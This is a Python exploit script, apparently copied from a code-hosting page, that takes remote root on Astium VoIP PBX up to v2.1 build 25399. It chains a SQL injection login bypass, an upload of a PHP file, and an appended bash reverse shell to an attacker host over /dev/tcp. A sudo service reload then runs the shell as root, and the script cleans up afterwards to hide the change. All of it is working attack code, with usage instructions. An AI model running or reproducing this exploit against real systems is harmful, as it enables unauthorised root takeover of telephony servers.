163 lines
No EOL
6.6 KiB
Python
Executable file
163 lines
No EOL
6.6 KiB
Python
Executable file
#!/usr/bin/python
|
|
#+--------------------------------------------------------------------------------------------------------------------------------+
|
|
# Exploit Title : Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit
|
|
# Date : 01-02-2012
|
|
# Author : xistence (xistence<[AT]>0x90.nl)
|
|
# Software link : http://www.oneip.nl/telefonie-oplossingen/ip-telefooncentrale/astium-downloaden-en-installeren/?lang=en
|
|
# Vendor site : http://www.oneip.nl/
|
|
# Version : v2.1 build 25399
|
|
# Tested on : CentOS 5.x 32-bit
|
|
#
|
|
|
|
# Vulnerability : Astium is prone to multiple vulnerabilities. This exploit will use SQL injection to bypass authentication on the
|
|
# login page and get access as an administrator. After that it will upload and execute a PHP script which will modify the
|
|
# "/usr/local/astium/web/php/config.php" script with our reverse shell php code and run a
|
|
# "sudo /sbin/service astcfgd reload" (Apache user is allowed to restart this service through sudo).
|
|
# The service reload will cause the added code in "/usr/local/astium/web/php/config.php" to be executed as root and thus resulting in
|
|
# a reverse shell with root privileges.
|
|
# Code in "/usr/local/astium/web/php/config.php" is also removed again, else the web interface will stop functioning!
|
|
#
|
|
# Vendor has been contacted several times since 8-22-2011(!) and promised to fix the issue, but until now hasn't resolved the issue.
|
|
#
|
|
#+--------------------------------------------------------------------------------------------------------------------------------+
|
|
|
|
import urllib, urllib2, cookielib
|
|
import sys
|
|
import random
|
|
import mimetools
|
|
import mimetypes
|
|
from cStringIO import StringIO
|
|
import itertools
|
|
|
|
print "[*] Astium VoIP PBX <= v2.1 build 25399 Multiple Vulns Remote Root Exploit - xistence - xistence[at]0x90[.]nl - 2013-01-02"
|
|
if (len(sys.argv) != 4):
|
|
print "[*] Usage: " + sys.argv[0] + " <RHOST> <LHOST> <LPORT>"
|
|
exit(0)
|
|
|
|
rhost = sys.argv[1]
|
|
lhost = sys.argv[2]
|
|
lport = sys.argv[3]
|
|
|
|
class MultiPartForm(object):
|
|
"""Accumulate the data to be used when posting a form."""
|
|
|
|
def __init__(self):
|
|
self.form_fields = []
|
|
self.files = []
|
|
self.boundary = mimetools.choose_boundary()
|
|
return
|
|
|
|
def get_content_type(self):
|
|
return 'multipart/form-data; boundary=%s' % self.boundary
|
|
|
|
def add_field(self, name, value):
|
|
"""Add a simple field to the form data."""
|
|
self.form_fields.append((name, value))
|
|
return
|
|
|
|
def add_file(self, fieldname, filename, fileHandle, mimetype=None):
|
|
"""Add a file to be uploaded."""
|
|
body = fileHandle.read()
|
|
if mimetype is None:
|
|
mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
|
|
self.files.append((fieldname, filename, mimetype, body))
|
|
return
|
|
|
|
def __str__(self):
|
|
"""Return a string representing the form data, including attached files."""
|
|
# Build a list of lists, each containing "lines" of the
|
|
# request. Each part is separated by a boundary string.
|
|
# Once the list is built, return a string where each
|
|
# line is separated by '\r\n'.
|
|
parts = []
|
|
part_boundary = '--' + self.boundary
|
|
|
|
# Add the form fields
|
|
parts.extend(
|
|
[ part_boundary,
|
|
'Content-Disposition: form-data; name="%s"' % name,
|
|
'',
|
|
value,
|
|
]
|
|
for name, value in self.form_fields
|
|
)
|
|
|
|
# Add the files to upload
|
|
parts.extend(
|
|
[ part_boundary,
|
|
'Content-Disposition: file; name="%s"; filename="%s"' % \
|
|
(field_name, filename),
|
|
'Content-Type: %s' % content_type,
|
|
'',
|
|
body,
|
|
]
|
|
for field_name, filename, content_type, body in self.files
|
|
)
|
|
|
|
# Flatten the list and add closing boundary marker,
|
|
# then return CR+LF separated data
|
|
flattened = list(itertools.chain(*parts))
|
|
flattened.append('--' + self.boundary + '--')
|
|
flattened.append('')
|
|
return '\r\n'.join(flattened)
|
|
|
|
|
|
# PHP script to write our reverse shell to the /usr/local/astium/web/php/config.php script.
|
|
phpScript='''<?php
|
|
$f = fopen("/usr/local/astium/web/php/config.php", "a");
|
|
fwrite($f, "\\n<?php system('/bin/bash -i >& /dev/tcp/%s/%s 0>&1'); ?>");
|
|
fclose($f);
|
|
system("sudo /sbin/service astcfgd reload");
|
|
// Sleep 1 minute, so that we have enough time for the reload to trigger our reverse shell
|
|
sleep(60);
|
|
$lines = file('/usr/local/astium/web/php/config.php');
|
|
// Delete last 2 lines (containing our reverse shell) of the config.php file, else the web interface won't work anymore after our exploit.
|
|
array_pop($lines);
|
|
array_pop($lines);
|
|
$file = join('', $lines);
|
|
$file_handle = fopen('/usr/local/astium/web/php/config.php', 'w');
|
|
fputs($file_handle, $file);
|
|
fclose($file_handle);
|
|
?>''' % (lhost, lport)
|
|
|
|
# Create a random file with 8 characters
|
|
filename = ''
|
|
for i in random.sample('abcdefghijklmnopqrstuvwxyz1234567890',8):
|
|
filename+=i
|
|
filename +=".php"
|
|
|
|
# Create the form with simple fields
|
|
form = MultiPartForm()
|
|
form.add_field('__act', 'submit')
|
|
|
|
# Add a "fake" file, our simple PHP script.
|
|
form.add_file('importcompany', filename, fileHandle=StringIO(phpScript))
|
|
|
|
# SQL Injection to bypass login
|
|
SQLiAuthBypass = "system' OR 1='1"
|
|
|
|
# Our Cookie Jar
|
|
cj = cookielib.CookieJar()
|
|
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
|
|
|
|
print "[*] Opening index.php to get Cookies"
|
|
# Just open the url to grab the cookies and put them in the jar
|
|
resp = opener.open("http://%s/en/content/index.php" %rhost)
|
|
|
|
print "[*] Sending evil SQLi authentication bypass payload"
|
|
# Set our post parameters and bypass the logon.php with our SQL Injection
|
|
post_params = urllib.urlencode({'__act' : 'submit', 'user_name' : SQLiAuthBypass, 'pass_word' : 'pwned', 'submit' : 'Login'})
|
|
resp = opener.open("http://%s/en/logon.php" %rhost, post_params)
|
|
|
|
print "[*] Uploading PHP script " + filename + " to inject PHP code in '/usr/local/astium/web/php/config.php' and run a 'sudo /sbin/service astcfgd reload' to create a reverse shell"
|
|
# Create our multi-part body + headers file upload request
|
|
resp = urllib2.Request("http://%s/en/database/import.php" % rhost)
|
|
body = str(form)
|
|
resp.add_header('Content-type', form.get_content_type())
|
|
resp.add_header('Content-length', len(body))
|
|
resp.add_data(body)
|
|
request = opener.open(resp).read()
|
|
|
|
print "[*] Executing remote PHP script. Check your netcat shell. NOTE: this can take up to 1-2 minutes before it spawns a shell\n"
|
|
# Simple GET request to execute the script on the remote server
|
|
resp = opener.open("http://%s/upload/%s" % (rhost, filename)) |